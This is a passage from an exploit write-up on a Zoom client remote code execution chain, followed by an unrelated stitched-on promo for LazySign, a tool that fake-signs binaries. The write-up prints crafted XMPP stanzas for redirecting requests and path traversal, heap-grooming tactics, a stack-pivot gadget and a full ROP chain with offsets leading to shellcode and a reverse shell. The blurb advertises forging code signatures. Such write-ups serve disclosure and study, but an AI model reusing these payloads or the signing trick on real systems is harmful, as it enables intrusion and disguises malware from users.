As long as Bucket 3 didn’t fill up completely, all allocations for the targeted size range would happen in that bucket, allowing us to avoid overwriting the orange objects. So long as no new “orange” objects were created, we could freely try again and again. The randomization would actually help us ensure that we would eventually obtain the object layout we wanted.

Step 10: Info leak

Turning a buffer overflow into an information leak is quite a challenge, as it depends heavily on the functionality which is available in the application. Common ways would be to allocate something which has a length field, overflow over the length field and then read the field. This did not work for us: we did not find any available functionality in Zoom to send something with an allocation of 1025-1088 with a length field and with a way to request it again. It is possible that it does exist, but analyzing the object layout of the C++ objects was a slow process.

We took a good look at the parts we had code for, and we found a method, although it was tricky.

When libcurl is used to request a URL it will parse and encode the URL and copy the relevant fields into an internal structure. The path and query components of the URL are stored in different, heap allocated blocks with a zero-terminator. Any required URL encoding will already have taken place, so when the request is sent the entire string is copied to the socket until it gets to the first null-byte.

We had found a way to initiate HTTPS requests to a server we control. The method was by sending a weird combination of two stanzas Zoom would normally use, one for sending an invitation to add a user and one notifying the user that a new bot was added to their account. A string from the stanza is then appended to a domain to download an image. However, the string of the prepended domain does not end with a /, so it is possible to extend it to end up at a different domain.

A stanza for requesting another user to be added to your contact list:

<presence xmlns="jabber:client" type="subscribe" email="[email of other user]" from="[email protected]/ZoomChat_pc">
  <status>{"e":"[email protected]","screenname":"John Doe","t":1617178959313}</status>
</presence>

The stanza informing a user that a new bot (in this case, SurveyMonkey) was added to their account:

<presence from="[email protected]/ZoomChat_pc" to="[email protected]/ZoomChat_pc" type="probe">
  <zoom xmlns="zm:x:group" group="Apps##61##addon.SX4KFcQMRN2XGQ193ucHPw" action="add_member" option="0" diff="0:1">
    <members>
      <member fname="SurveyMonkey" lname="" jid="[email protected]" type="1" cmd="/sm" pic_url="https://marketplacecontent.zoom.us//CSKvJMq_RlSOESfMvUk- dw/nhYXYiTzSYWf4mM3ZO4_dw/app/UF-vuzIGQuu3WviGzDM6Eg/iGpmOSiuQr6qEYgWh15UKA.png" pic_relative_url="//CSKvJMq_RlSOESfMvUk-dw/nhYXYiTzSYWf4mM3ZO4_dw/app/UF- vuzIGQuu3WviGzDM6Eg/iGpmOSiuQr6qEYgWh15UKA.png" introduction="Manage SurveyMonkey surveys from your Zoom chat channel." signature="" extension="eyJub3RTaG93IjowLCJjbWRNb2RpZnlUaW1lIjoxNTc4NTg4NjA4NDE5fQ=="/>
    </members>
  </zoom>
</presence>

While a client only expects this stanza from the server, it is possible to send it from a different user account. It is then handled if the sender is not yet in the user’s contact list. So combining these two things, we ended up with the following:

<presence from="[email protected]/ZoomChat_pc" to="[email protected]/ZoomChat_pc">
  <zoom xmlns="zm:x:group" group="Apps##61##addon.SX4KFcQMRN2XGQ193ucHPw" action="add_member" option="0" diff="0:0">
    <members>
      <member fname="SurveyMonkey" lname="" jid="[email protected]" type="1" cmd="/sm" pic_url="https://marketplacecontent.zoom.us//CSKvJMq_RlSOESfMvUk- dw/nhYXYiTzSYWf4mM3ZO4_dw/app/UF-vuzIGQuu3WviGzDM6Eg/iGpmOSiuQr6qEYgWh15UKA.png" pic_relative_url="example.org//CSKvJMq_RlSOESfMvUk-dw/nhYXYiTzSYWf4mM3ZO4_dw/app/UF- vuzIGQuu3WviGzDM6Eg/iGpmOSiuQr6qEYgWh15UKA.png" introduction="Manage SurveyMonkey surveys from your Zoom chat channel." signature="" extension="eyJub3RTaG93IjowLCJjbWRNb2RpZnlUaW1lIjoxNTc4NTg4NjA4NDE5fQ=="/>
    </members>
  </zoom>
</presence>

The pic_url attribute here is ignored. Instead, the pic_relative_url attribute is used, with "https://marketplacecontent.zoom.us" prepended to it. This means a request is performed to:

"https://marketplacecontent.zoom.us" + image
"https://marketplacecontent.zoom.us" + "example.org//CSKvJMq_RlSOESfMvUk-dw/nhYXYiTzSYWf4mM3ZO4_dw/app/UF- vuzIGQuu3WviGzDM6Eg/iGpmOSiuQr6qEYgWh15UKA.png"
"https://marketplacecontent.zoom.usexample.org//CSKvJMq_RlSOESfMvUk-dw/nhYXYiTzSYWf4mM3ZO4_dw/app/UF- vuzIGQuu3WviGzDM6Eg/iGpmOSiuQr6qEYgWh15UKA.png"

Because this is not restricted to subdomains of zoom.us, we could redirect it to a server we control.

We are still not fully sure why this worked, but it worked. This is one of two additional, low impact bugs we used for our attack and which is also currently fixed according to the Zoom Security Bulletin. On its own, this could be used to obtain the external IP address of another user if they are signed in to Zoom, even when you are not a contact.

Setting up a direct connection was very helpful for us, because we had much more control over this connection than over the XMPP connection. The XMPP connection is not direct, but through the server. This meant that invalid XML would not reach us. As the addresses we wanted to leak was unlikely to consist of entirely printable characters, we couldn’t try to get these included in a stanza that would reach us. With a direct connection, we were not restricted in any way.

Our plan was to do the following:

Initiate a HTTPS request using a URL with a query part of 1087 bytes to a server we control.
Accept the connection, but delay responding to the TLS handshake.
Trigger the buffer overflow such that the buffer we overflow is immediately before the block containing the query part of the URL. This overwrites the heap header of the query block, the entire query (including the zero-terminator at the end) and the next heap header.
Let the TLS handshake proceed.
Receive the query, with the heap header and start of the next block in the HTTP request.

This video illustrates how this works:

In essence, this similar to creating an object, overwriting a length field and reading it. Instead of a counter for the length, we overwrite the zero-terminator of a string by writing all the way over the contents of a buffer.

This allowed us to leak data from the start of the next block up to the first null-byte in it. Conveniently, we had also found an interesting object to place there in the source of OpenSSL, libcrypto-1_1.dll to be specific. TLS1_PRF_PKEY_CTX is an object which is used during a TLS handshake to verify a MAC of the transcript during a handshake, to make sure an active attacker has not changed anything during the handshake. This struct starts with a pointer to another structure inside the same DLL (a static structure for a hashing function).

typedef struct {
    /* Digest to use for PRF */
    const EVP_MD *md;
    /* Secret value to use for PRF */
    unsigned char *sec;
    size_t seclen;
    /* Buffer of concatenated seed data */
    unsigned char seed[TLS1_PRF_MAXBUF];
    size_t seedlen;
} TLS1_PRF_PKEY_CTX;

There is one downside to this object: it is created, used and deallocated within one function call. But luckily, OpenSSL does not clear the full contents of the object, so the pointer at the start remains in the deallocated block:

static void pkey_tls1_prf_cleanup(EVP_PKEY_CTX *ctx)
{
    TLS1_PRF_PKEY_CTX *kctx = ctx->data;
    OPENSSL_clear_free(kctx->sec, kctx->seclen);
    OPENSSL_cleanse(kctx->seed, kctx->seedlen);
    OPENSSL_free(kctx);
}

This means that we could leak the pointer we want, but in order to do so we would need to place three objects just right. We needed to place 3 blocks in the right order in a bucket: the block we overflow, the query part of a URL for our initiated HTTPS request and a deallocated TLS1_PRF_PKEY_CTX object. One common way for defeating heap randomization in exploits is to just allocate a lot of objects and try often, but it’s not that simple in this case: we need enough objects and overflows to have a chance of success, but also not too many to still allow deallocated TLS1_PRF_PKEY_CTX objects to remain. If we allocated too many queries, no TLS1_PRF_PKEY_CTX objects would be left. This was a difficult balance to hit.

We tried this a lot and it took days, but eventually we leaked the address once. Then, a few days later, it worked again. And then again the same day. Slowly we were finding the right balance of the number of objects, connections and overflows.

The @z\x15p (0x70157a40) here is the leaked address in libcrypto-1_1.dll:

One thing that greatly increased the chances of success was to use TLS renegotiation. The TLS1_PRF_PKEY_CTX object is created during a handshake, but setting up new connections takes time and does a lot of allocations that could disturb our heap bucket. We found that we could also set up a connection and use TLS renegotiation repeatedly, which meant that the handshake was performed again but nothing else. OpenSSL supports renegotation, and even if you want to renegotiate thousands of times without ever sending a HTTP response this is entirely fine. We ended up creating 3 connections to a webserver that was doing nothing other than constantly renegotiating. This allowed us to create a constant stream of new deallocated TLS1_PRF_PKEY_CTX objects in the deallocated space in the bucket.

The info leak did however remain the most unstable part of our exploit. If you watch the video of our exploit back, then the longest delay will be waiting for the info leak. Vincent from ZDI mentions when the info leak happens during the second attempt. As you can see, the rest of the exploit completes quite quickly after that.

Step 11: Control

The next step was to find an object where we could overwrite a vtable or function pointer. Here, again, we found a useful open source component in a DLL. The file viper.dll contains a copy of the WebRTC library from around 2012. Initially, we found that when a call invite is received (even if it is not answered), viper.dll creates 5 objects of 1064 bytes which all start with a vtable. By searching the WebRTC source code we found that these were FileWrapperImpl objects. These can be seen as adding a C++ API around FILE * pointers from C: methods for writing and reading data, automatic closing and flushing in the destructor, etc. There was one downside: these 5 objects were doing nothing. If we overwrote their vtable in the debugger, nothing would happen until we exited Zoom, only then the destructor would call some vtable functions.

class FileWrapperImpl : public FileWrapper {
 public:
  FileWrapperImpl();
  ~FileWrapperImpl() override;

  int FileName(char* file_name_utf8, size_t size) const override;

  bool Open() const override;

  int OpenFile(const char* file_name_utf8,
               bool read_only,
               bool loop = false,
               bool text = false) override;

  int OpenFromFileHandle(FILE* handle,
                         bool manage_file,
                         bool read_only,
                         bool loop = false) override;

  int CloseFile() override;
  int SetMaxFileSize(size_t bytes) override;
  int Flush() override;

  int Read(void* buf, size_t length) override;
  bool Write(const void* buf, size_t length) override;
  int WriteText(const char* format, ...) override;
  int Rewind() override;

 private:
  int CloseFileImpl();
  int FlushImpl();

  std::unique_ptr<RWLockWrapper> rw_lock_;

  FILE* id_;
  bool managed_file_handle_;
  bool open_;
  bool looping_;
  bool read_only_;
  size_t max_size_in_bytes_;  // -1 indicates file size limitation is off
  size_t size_in_bytes_;
  char file_name_utf8_[kMaxFileNameSize];
};

Code execution at exit was far from ideal: this would mean we had just one shot in each attempt. If we had failed to overwrite a vtable we would have no chance to try again. We also did not have a way to remotely trigger a clean exit, but even if we had, the chance we could exit successfully were small. The information leak will have corrupted many objects and heap metadata in the previous phase, which maybe didn’t affect anything yet if those objects are unused, but if we tried to exit could cause a crash due to destructors or freeing.

Based on the WebRTC source code, we noticed the FileWrapperImpl objects are often used in classes related to audio playback. As it happens, the Windows VM Thijs was using at that time did not have an emulated sound card. There was no need for one, as we were not looking at exploiting the actual meeting functionality. Daan suggested to add one, because it could matter for these objects. Thijs was skeptical, but security involves trying a lot of things you don’t expect to work, so he added one. After this, the creation of FileWrapperImpls had indeed changed significantly.

With a emulated sound card, new FileWrapperImpls were created and destroyed regularly while the call was ringing. Each loop of the jingle seemed to trigger a number of allocations and frees of these objects. It is a shame the videos we have of the exploit do not have sound: you would have heard the ringing sound complete a couple of full loops at the moment it exits and calc is started.

This meant we had a vtable pointer we could overwrite quite reliably, but now the question is: what to write there?

Step 12: GIPHY time

We had obtained the offset of libcrypto-1_1.dll using our information leak, but we also needed an address of data under our control: if we overwrite a vtable pointer, then it needs to point to an area containing one or more function pointers. ASLR means we don’t know for sure where our heap allocations end up. To deal with this, we used GIFs.

Hack the planet GIPHY

To send an out-of-meeting message in Zoom, the receiving user has to have previously accepted a connect request or be in a multi-user chat with the attacker. If a user is able to send a message with an image to another user in Zoom, then that image is downloaded and shown automatically if it is below a few megabytes. If it is larger, the user needs to click on it to download it.

In the Zoom chat client, it is also possible to send GIFs from GIPHY. For these images, the file size restriction is not applied and the files are always downloaded and shown. User uploads and GIPHY files are both downloaded from the same domain, but using different paths. By sending an XMPP message for sending a GIPHY, but using path traversal to point it to a user uploaded GIF file instead, we found that we could allow the downloading of arbitrary sized GIF files. If the file is a valid GIF file, then it is loaded into memory. If we send the same link again then it is not downloaded twice, but a new copy is allocated in memory. This is the second low impact vulnerability we used, which is also fixed according to the Zoom Security Bulletin.

A normal GIPHY message:

<message xmlns="jabber:client" to="[email protected]" id="{62BFB8B6-9572-455C-B440-98F532517177}" type="chat" from="[email protected]/ZoomChat_pc">
  <body>John Doe sent you a GIF image. In order to view it, please upgrade to the latest version that supports GIFs: https://www.zoom.us/download</body>
  <thread>gloox{F1FFE4F0-381E-472B-813B-55D766B87742}</thread>
  <active xmlns="http://jabber.org/protocol/chatstates"/>
  <sns>
    <format>%1$@ sent you an image</format>
    <args>
      <arg>John Doe</arg>
    </args>
  </sns>
  <zmext>
    <msg_type>12</msg_type>
    <from n="John Doe" res="ZoomChat_pc"/>
    <to/>
    <visible>true</visible>
    <msg_feature>16384</msg_feature>
  </zmext>
  <giphyv2 id="YQitE4YNQNahy" url="https://giphy.com/gifs/YQitE4YNQNahy" tags="hacker">
    <pcInfo url="https://file.zoom.us/external/link/issue?id=1::HYlQuJmVbpLCRH1UrxGcLA::aatxNv43wlLYPmeAHSEJ4w::7ZOfQeOxWkdqbfz-Dx-zzununK0e5u80ifybTdCJ-Bdy5aXUiEOV0ZF17hCeWW4SnOllKIrSHUpiq7AlMGTGJsJRHTOC9ikJ3P0TlU1DX-u7TZG3oLIT8BZgzYvfQS-UzYCwm3caA8UUheUluoEEwKArApaBQ3BC4bEE6NpvoDqrX1qX" size="1456787"/>
    <mobileInfo url="https://file.zoom.us/external/link/issue?id=1::0ZmI3n09cbxxQtPKqWbv1g::AmSzU9Wrsp617D6cX05tMg::_Q5mp2qCa4PVFX8gNWtCmByNUliio7JGEpk7caC9Pfi2T66v2D3Jfy7YNrV_OyIRgdT5KJdffuZsHfYxc86O7bPgKROWPxfiyOHHwjVxkw80ivlkM0kTSItmJfd2bsdryYDnEIGrk-6WQUBxBOIpyMVJ2itJ-wc6tmOJBUo9-oCHHdi43Dk" size="549356"/>
    <bigPicInfo url="https://file.zoom.us/external/link/issue?id=1::hA-lI2ZGxBzgJczWbR4yPQ::ZxQquub32hKf5Tle_fRKGQ::TnskidmcXKrAUhyi4UP_QGp2qGXkApB2u9xEFRp5RHsZu1F6EL1zd-6mAaU7Cm0TiPQnALOnk1-ggJhnbL_S4czgttgdHVRKHP015TcbRo92RVCI351AO8caIsVYyEW5zpoTSmwsoR8t5E6gv4Wbmjx263lTi 1aWl62KifvJ_LDECBM1" size="4322534"/>
  </giphyv2>
</message>

A GIPHY message with a manipulated path (only the bigPicInfo URL is relevant):

<message xmlns="jabber:client" to="[email protected]" id="{62BFB8B6-9572-455C-B440-98F532517177}" type="chat" from="[email protected]/ZoomChat_pc">
  <body>John Doe sent you a GIF image. In order to view it, please upgrade to the latest version that supports GIFs: https://www.zoom.us/download</body>
  <thread>gloox{F1FFE4F0-381E-472B-813B-55D766B87742}</thread>
  <active xmlns="http://jabber.org/protocol/chatstates"/>
  <sns>
    <format>%1$@ sent you an image</format>
    <args>
      <arg>John Doe</arg>
    </args>
  </sns>
  <zmext>
    <msg_type>12</msg_type>
    <from n="John Doe" res="ZoomChat_pc"/>
    <to/>
    <visible>true</visible>
    <msg_feature>16384</msg_feature>
  </zmext>
  <giphyv2 id="YQitE4YNQNahy" url="https://giphy.com/gifs/YQitE4YNQNahy" tags="hacker">
    <pcInfo url="https://file.zoom.us/external/link/issue?id=1::HYlQuJmVbpLCRH1UrxGcLA::aatxNv43wlLYPmeAHSEJ4w::7ZOfQeOxWkdqbfz-Dx-zzununK0e5u80ifybTdCJ-Bdy5aXUiEOV0ZF17hCeWW4SnOllKIrSHUpiq7AlMGTGJsJRHTOC9ikJ3P0TlU1DX-u7TZG3oLIT8BZgzYvfQS-UzYCwm3caA8UUheUluoEEwKArApaBQ3BC4bEE6NpvoDqrX1qX" size="1456787"/>
    <mobileInfo url="https://file.zoom.us/external/link/issue?id=1::0ZmI3n09cbxxQtPKqWbv1g::AmSzU9Wrsp617D6cX05tMg::_Q5mp2qCa4PVFX8gNWtCmByNUliio7JGEpk7caC9Pfi2T66v2D3Jfy7YNrV_OyIRgdT5KJdffuZsHfYxc86O7bPgKROWPxfiyOHHwjVxkw80ivlkM0kTSItmJfd2bsdryYDnEIGrk-6WQUBxBOIpyMVJ2itJ-wc6tmOJBUo9-oCHHdi43Dk" size="549356"/>
    <bigPicInfo url="https://file.zoom.us/external/link/issue/../../../file/[file_id]" size="4322534"/>
  </giphyv2>
</message>

Our plan was to create a 25 MB GIF file and allocate it multiple times to create a specific address where the data we needed would be placed. Large allocations of this size are randomized when ASLR is used, but these allocations are still page aligned. Because the data we wanted to place was much less than one page, we could just create one page of data and repeat that. This page started with a minimal GIF file, which was enough for the entire file to be considered a valid GIF file. Because Zoom is a 32-bit application, the possible address space is very small. If enough copies of the GIF file are loaded in memory (say, around 512 MB), then we can quite reliably “guess” that a specific address falls inside a GIF file. Due to the page-alignment of these large allocations, we can then use offsets from the page boundary to locate the data we want to refer to.

Step 13: Pivot into ROP

Now we have all the ingredients to call an address in libcrypto-1_1.dll. But to gain arbitrary code execution, we would (probably) need to call multiple functions. For stack buffer overflows in modern software this is commonly achieved using return-oriented programming (ROP). By placing return addresses on the stack to call functions or perform specific register operations, multiple functions can be called sequentially with control over the arguments.

We had a heap buffer overflow, so we could not do anything with the stack just yet. The way we did this is known as a stack pivot: we replaced the address of the stack pointer to point to data we control. We found the following sequence of instructions in libcrypto-1_1.dll:

push edi; # points to vtable pointer (memory we control)
pop esp;  # now the stack pointer points to memory under our control
pop edi;  # pop some extra registers
pop esi; 
pop ebx; 
pop ebp; 
ret

This sequence is misaligned and normally does something else, but for us this could be used to copy an address to data we overwrote (in edi) to the stack pointer. This means that we have replaced the stack with data we wrote with the buffer overflow.

From our ROP chain we wanted to call VirtualProtect to enable the execute bit for our shellcode. However, libcrypto-1_1.dll does not import VirtualProtect, so we don’t have the address for this yet. Raw system calls from 32-bit Windows applications are, apparently, difficult. Therefore, we used the following ROP chain:

Call GetModuleHandleW to get the base address of kernel32.dll.
Call GetProcAddress to get the address of VirtualProtect from kernel32.dll.
Call that address to make the GIF data executable.
Jump to the shellcode offset in the GIF.

In the following animation, you can see how we overwrite the vtable, and then when Close is called the stack is pivoted to our buffer overflow. Due to the extra pop instructions in the stack pivot gadget, some unused values are popped. Then, the ROP chain stats by calling GetModuleHandleW with as argument the string "kernel32.dll" from our GIF file. Finally, when returning from that function a gadget is called that places the result value into ebx. The calling convention in use here means the argument is passed via the stack, before the return address.

In our exploit this results in the following ROP stack (crypto_base points to the load address of libcrypto-1_1.dll we leaked earlier):

# push edi; pop esp; pop edi; pop esi; pop ebx; pop ebp; ret
STACK_PIVOT = crypto_base + 0x441e9

GIF_BASE = 0x462bc020
VTABLE = GIF_BASE + 0x1c # Start of the correct vtable
SHELLCODE = GIF_BASE + 0x7fd # Location of our shellcode
KERNEL32_STR = GIF_BASE + 0x6c  # Location of UTF-16 Kernel32.dll string
VIRTUALPROTECT_STR = GIF_BASE + 0x86 # Location of VirtualProtect string

KNOWN_MAPPED = 0x2fe451e4

JMP_GETMODULEHANDLEW = crypto_base + 0x1c5c36 # jmp GetModuleHandleW
JMP_GETPROCADDRESS = crypto_base + 0x1c5c3c # jmp GetProcAddress

RET = crypto_base + 0xdc28 # ret
POP_RET = crypto_base + 0xdc27 # pop ebp; ret
ADD_ESP_24 = crypto_base + 0x6c42e # add esp, 0x18; ret

PUSH_EAX_STACK = crypto_base + 0xdbaa9 # mov dword ptr [esp + 0x1c], eax; call ebx
POP_EBX = crypto_base + 0x16cfc # pop ebx; ret
JMP_EAX = crypto_base + 0x23370 # jmp eax

rop_stack = [
VTABLE,     # pop edi
GIF_BASE + 0x101f4, # pop esi
GIF_BASE + 0x101f4, # pop ebx
KNOWN_MAPPED + 0x20, # pop ebp
JMP_GETMODULEHANDLEW,
POP_EBX,
KERNEL32_STR,

ADD_ESP_24,
PUSH_EAX_STACK,
0x41414141,
POP_RET, # Not used, padding for other objects
0x41414141,
0x41414141,
0x41414141,
JMP_GETPROCADDRESS,
JMP_EAX,
KNOWN_MAPPED + 0x10, # This will be overwritten with the base address of Kernel32.dll
VIRTUALPROTECT_STR,
SHELLCODE,
SHELLCODE & 0xfffff000,
0x1000,
0x40,
SHELLCODE - 8,
]

And that’s it! We now had a reverse shell and could launch calc.exe.

Reliability, reliability, reliability

The last week before the contest was focused on getting it to an acceptable reliability level. As we mentioned in the info leak, this phase was very tricky. It took a lot of time to get it to having even a tiny chance to succeed. We had to overwrite a lot of data here, but the application had to remain stable enough that we could still perform the second phase without crashing.

There were a lot of things we did to improve the reliability and many more we tried and gave up. These can be summarized in two categories: decreasing the chance that we overwrote something we shouldn’t and decreasing the chance that the client would crash when we had overwritten something we didn’t intend to.

In the second phase, it could happen that we overwrote the vtable of a different object. Whenever we had a crash like this, we would try to fix it by placing a compatible no-op function on the corresponding place in the vtable. This is harder than it sounds on 32-bit Windows, because there are multiple calling conventions involved and some require the RET instruction to pop the arguments from the stack, which means that we needed a no-op that pops the right number of values.

In the first phase, we also had a chance of overwriting pointers in objects in the same size range. We could not yet deal with function pointers or vtables as we had no info leak, but we could place pointers to readable/writable memory. We started our exploit by uploading some GIF files to create known addresses with controlled data before this phase so we could use those addresses in the data we used for the overflow. Of course, the data in the GIF files could again be dereferenced as a pointer, requiring multiple layers of fake addresses.

What may not yet be clear is that each attempt required a slow manual process. Each time we wanted to run our exploit, we would launch the client, clear all chat messages for the victim, exit the client and launch it again. Because the memory layout was so important, we had to make sure we started from an identical state each time. We had not automated this, because we were paranoid about ensuring the client would be used in exactly the same way as during the contest. Anything we did differently could influence the heap layout. For example, we noticed that adding network interception could have some effect on how network requests were allocated, changing the heap layout. Our attempts were often close to 5 minutes, so even just doing 10 attempts took an hour. To assess if a change improved the reliability, 10 runs was pretty low.

Both the info leak and the vtable overwrite phase run in loops. If we were lucky, we had success in the first iteration of the loop, but it could go on for a long time. To improve our chance of success in the time limit, our exploit would slowly increase the risk it took the more iterations it needed. In the first iteration we would only overflow a small number of times and only one object, but this would increase to more and more overflows with larger sizes the longer it took.

In the second phase we could take more risks. The application did not need to remain stable enough for another phase and we only needed two adjacent allocations, not also a third unallocated block. By overwriting 10 blocks further, we had a very good chance of hitting the needed object with just one or two iterations.

In the end, we estimated that our exploit had about a 50% chance of success in the 5 minutes. If, on the other hand, we could leak the address of libcrypto-1_1.ddl in one run and then skip the info leak in the next run (the locations of ASLR randomized dlls remain the same on Windows for some time), we could increase our reliability to around 75%. ZDI informed us during the contest that this would result in a partial win, but it never got to the point where we could do that. The first attempt failed in the first phase.

Conclusion

After we handed in our final exploit the nerve-wracking process of waiting started. Since we needed to hand in our final exploit two days before the event and the organizers would not run our exploit until our attempt, it was out of our hands. Even during the attempts we could not see the attacker’s screen, for example, so we had no idea if everything worked as planned. The enormous relief when calc.exe popped up made it worth it in the end.

In total we spend around 1.5 weeks from the start of our research until we had the main vulnerability of our exploit. Writing and testing the exploit itself took another 1.5 months, including the time we needed to read up on all Windows internals we needed for our exploit.

We would like to thank ZDI and Zoom for organizing this year’s event, and hopefully see you guys next year!

LazySign - Create Fake Certs For Binaries Using Windows Binaries And The Power Of Bat Files

KitPloit - PenTest & Hacking Tools

Zion3R

23 August 2021 at 21:30

Create fake certs for binaries using windows binaries and the power of bat files

Over the years, several cool tools have been released that are capeable of stealing or forging fake signatures for binary files. All of these tools however, have additional dependencies which require Go,python,...

This repo gives you the opportunity of fake signing with 0 additional dependencies, all of the binaries used are part of Microsoft's own devkits. I took the liberty of writing a bat file to make things easy.

So if you are lazy like me, just clone the git, run the bat, follow the instructions and enjoy your new fake signed binary. With some adjustments it could even be used to sign using valid certs as well ¯\(ツ)/¯

Download LazySign